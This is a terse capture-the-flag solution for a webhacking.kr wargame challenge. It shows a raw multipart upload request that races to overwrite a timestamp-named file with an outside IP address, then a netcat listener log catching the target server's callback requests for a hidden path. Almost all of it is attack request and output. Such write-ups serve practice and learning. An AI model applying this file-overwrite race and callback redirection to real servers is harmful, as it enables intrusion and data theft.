After the file corresponding to the timestamp has been created,
if the file the user uploaded is created and overwrites it
POST /challenge/web/web-18/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 201
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
HTTPS: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKkJG4iYFhMBuVlI7
Referer: http://webhacking.kr/challenge/web/web-18/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7; oldzombie=1
X-dotNet-Beautifier: 803; DO-NOT-REMOVE

------WebKitFormBoundaryKkJG4iYFhMBuVlI7
Content-Disposition: form-data; name="upfile"; filename="tmp-1437704995"
Content-Type: text/html

52.69.246.182
------WebKitFormBoundaryKkJG4iYFhMBuVlI7--

ubuntu@ip-172-30-0-53:~$ nc -l 7777
GET /05cc6666ca3c323ee2a91fdff98435ec HTTP/1.0
Host: 52.69.246.182
GET /05cc6666ca3c323ee2a91fdff98435ec HTTP/1.0
Host: 52.69.246.182
ubuntu@ip-172-30-0-53:~$